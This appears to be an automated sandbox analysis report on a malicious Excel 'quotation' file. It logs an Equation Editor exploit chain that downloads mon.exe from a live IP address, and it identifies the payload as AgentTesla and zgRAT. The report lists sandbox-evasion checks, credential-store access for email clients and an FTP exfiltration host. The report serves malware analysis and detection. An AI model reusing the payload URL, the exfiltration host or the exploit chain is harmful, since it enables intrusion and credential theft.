Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
Date: Mon, 08 Aug 2022 15:26:50 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.0.19
Last-Modified: Mon, 08 Aug 2022 13:26:41 GMT
ETag: "dae00-5e5bac4276722"
Accept-Ranges: bytes
Content-Length: 896512
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
Source: global traffic HTTP traffic detected: GET /mon/mon.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 198.12.89.152
Connection: Keep-Alive
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_033F0517 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_033F0517
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: EQNEDT32.EXE, 00000002.00000002.980461648.00000000005E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.980461648.00000000005E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: Regasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ftp://ftp.alonsorojasmudanzasnacionales.com/okok
Source: Regasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: EQNEDT32.EXE, 00000002.00000002.980927882.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.980231565.000000000055F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://198.12.89.152/mon/mon.exe
Source: EQNEDT32.EXE, 00000002.00000002.980379533.00000000005A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://198.12.89.152/mon/mon.exehhC:
Source: Regasm_svchost.exe, 00000006.00000002.1174896725.000000000262C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://77qlBFDgeMeBhXCCMul.org
Source: Regasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: Regasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ZSkVPd.com
Source: Regasm_svchost.exe, 00000006.00000002.1174896725.000000000262C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Regasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9FBCD146.wmf Jump to behavior

System Summary

Source: 6.0.Regasm_svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 6.0.Regasm_svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 5.2.Regasm_svchost.exe.365ed50.11.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.2.Regasm_svchost.exe.365ed50.11.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 5.2.Regasm_svchost.exe.3693370.9.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.2.Regasm_svchost.exe.3693370.9.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000005.00000002.989818369.0000000003628000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000006.00000000.986284628.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: Regasm_svchost.exe PID: 2884, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: Regasm_svchost.exe PID: 616, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mon[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\Regasm_svchost.exe Jump to dropped file
Source: 6.0.Regasm_svchost.exe.400000.0.unpack, <PrivateImplementationDetails>{6FDDE178-8CC0-48F2-916F-3E2DAE062187}/4CAF38F2-454F-4211-A62C-7FB6FD0C5EE8.cs Large array initialization: .cctor: array initializer size 11646
Source: 6.0.Regasm_svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 6.0.Regasm_svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 5.2.Regasm_svchost.exe.365ed50.11.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.2.Regasm_svchost.exe.365ed50.11.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 5.2.Regasm_svchost.exe.3693370.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.2.Regasm_svchost.exe.3693370.9.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000005.00000002.989818369.0000000003628000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000006.00000000.986284628.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: Regasm_svchost.exe PID: 2884, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: Regasm_svchost.exe PID: 616, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: C:\Users\Public\Regasm_svchost.exe Code function: 5_2_001D7060 5_2_001D7060
Source: C:\Users\Public\Regasm_svchost.exe Code function: 5_2_001DEDF0 5_2_001DEDF0
Source: C:\Users\Public\Regasm_svchost.exe Code function: 5_2_00A40048 5_2_00A40048
Source: C:\Users\Public\Regasm_svchost.exe Code function: 5_2_00A40024 5_2_00A40024
Source: C:\Users\Public\Regasm_svchost.exe Code function: 5_2_00A46B98 5_2_00A46B98
Source: C:\Users\Public\Regasm_svchost.exe Code function: 5_2_00A411E8 5_2_00A411E8
Source: C:\Users\Public\Regasm_svchost.exe Code function: 5_2_00A411D9 5_2_00A411D9
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_003D42A0 6_2_003D42A0
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_003D4EB8 6_2_003D4EB8
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_003DDED8 6_2_003DDED8
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_003DCA48 6_2_003DCA48
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_003D45E8 6_2_003D45E8
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_0062E839 6_2_0062E839
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_0062ACE8 6_2_0062ACE8
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_0062D4F8 6_2_0062D4F8
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_00624950 6_2_00624950
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_0062C788 6_2_0062C788
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_00627B98 6_2_00627B98
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_0062F0E8 6_2_0062F0E8
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_00625102 6_2_00625102
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_00660468 6_2_00660468
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77620000 page execute and read and write
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77740000 page execute and read and write
Source: C:\Users\Public\Regasm_svchost.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Users\Public\Regasm_svchost.exe Memory allocated: 77740000 page execute and read and write
Source: mon[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Regasm_svchost.exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Quotation - Optical Eyeglasses.xlsx Virustotal: Detection: 35%
Source: Quotation - Optical Eyeglasses.xlsx ReversingLabs: Detection: 31%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\Regasm_svchost.exe "C:\Users\Public\Regasm_svchost.exe"
Source: C:\Users\Public\Regasm_svchost.exe Process created: C:\Users\Public\Regasm_svchost.exe C:\Users\Public\Regasm_svchost.exe
Source: C:\Users\Public\Regasm_svchost.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
Source: C:\Users\Public\Regasm_svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\Regasm_svchost.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Quotation - Optical Eyeglasses.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR692D.tmp
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/23@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\Regasm_svchost.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: 6.0.Regasm_svchost.exe.400000.0.unpack, A/F1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\Regasm_svchost.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Users\Public\Regasm_svchost.exe Code function: 5_2_00A44FB3 push ebp; ret 5_2_00A44FB9
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_003D03E2 pushfd ; retf 0017h 6_2_003D0421
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_003D2591 pushfd ; retf 0017h 6_2_003D2595
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_00627328 push eax; retf 6_2_006273B1
Source: C:\Users\Public\Regasm_svchost.exe Code function: 6_2_006273C0 pushad ; retf 6_2_00627401
Source: initial sample Static PE information: section name: .text entropy: 7.741618830897132
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mon[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\Regasm_svchost.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_033F0517 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_033F0517

Boot Survival

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\Regasm_svchost.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Regasm_svchost.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: 00000005.00000002.989370105.000000000278B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Regasm_svchost.exe PID: 2884, type: MEMORYSTR
Source: Regasm_svchost.exe, 00000005.00000002.989370105.000000000278B000.00000004.00000800.00020000.00000000.sdmp, Regasm_svchost.exe, 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: Regasm_svchost.exe, 00000005.00000002.989370105.000000000278B000.00000004.00000800.00020000.00000000.sdmp, Regasm_svchost.exe, 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Source: C:\Users\Public\Regasm_svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Source: C:\Users\Public\Regasm_svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2056 Thread sleep time: -300000s >= -30000s
Source: C:\Users\Public\Regasm_svchost.exe TID: 2820 Thread sleep time: -45877s >= -30000s
Source: C:\Users\Public\Regasm_svchost.exe TID: 2956 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Regasm_svchost.exe TID: 1412 Thread sleep time: -540000s >= -30000s
Source: C:\Users\Public\Regasm_svchost.exe TID: 1436 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\Public\Regasm_svchost.exe TID: 1436 Thread sleep time: -510000s >= -30000s
Source: C:\Users\Public\Regasm_svchost.exe TID: 2088 Thread sleep count: 9428 > 30
Source: C:\Users\Public\Regasm_svchost.exe TID: 1436 Thread sleep count: 53 > 30
Source: C:\Users\Public\Regasm_svchost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Regasm_svchost.exe Window / User API: threadDelayed 9428
Source: C:\Users\Public\Regasm_svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\Regasm_svchost.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\Regasm_svchost.exe Process information queried: ProcessInformation
Source: C:\Users\Public\Regasm_svchost.exe Thread delayed: delay time: 45877
Source: C:\Users\Public\Regasm_svchost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Regasm_svchost.exe Thread delayed: delay time: 30000
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
Source: EQNEDT32.EXE, 00000002.00000002.980447357.00000000005DC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ??\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}[I
Source: Regasm_svchost.exe, 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Regasm_svchost.exe, 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: EQNEDT32.EXE, 00000002.00000002.980394637.00000000005A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: Regasm_svchost.exe, 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: Regasm_svchost.exe, 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\Public\Regasm_svchost.exe Process token adjusted: Debug
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_033F05E2 mov edx, dword ptr fs:[00000030h] 2_2_033F05E2
Source: C:\Users\Public\Regasm_svchost.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\Public\Regasm_svchost.exe Memory written: C:\Users\Public\Regasm_svchost.exe base: 400000 value starts with: 4D5A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\Regasm_svchost.exe "C:\Users\Public\Regasm_svchost.exe"
Source: C:\Users\Public\Regasm_svchost.exe Process created: C:\Users\Public\Regasm_svchost.exe C:\Users\Public\Regasm_svchost.exe
Source: C:\Users\Public\Regasm_svchost.exe Queries volume information: C:\Users\Public\Regasm_svchost.exe VolumeInformation
Source: C:\Users\Public\Regasm_svchost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 6.0.Regasm_svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Regasm_svchost.exe.365ed50.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Regasm_svchost.exe.3693370.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.989818369.0000000003628000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.986284628.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1174667673.0000000002588000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Regasm_svchost.exe PID: 2884, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Regasm_svchost.exe PID: 616, type: MEMORYSTR
Source: C:\Users\Public\Regasm_svchost.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\Regasm_svchost.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\Public\Regasm_svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
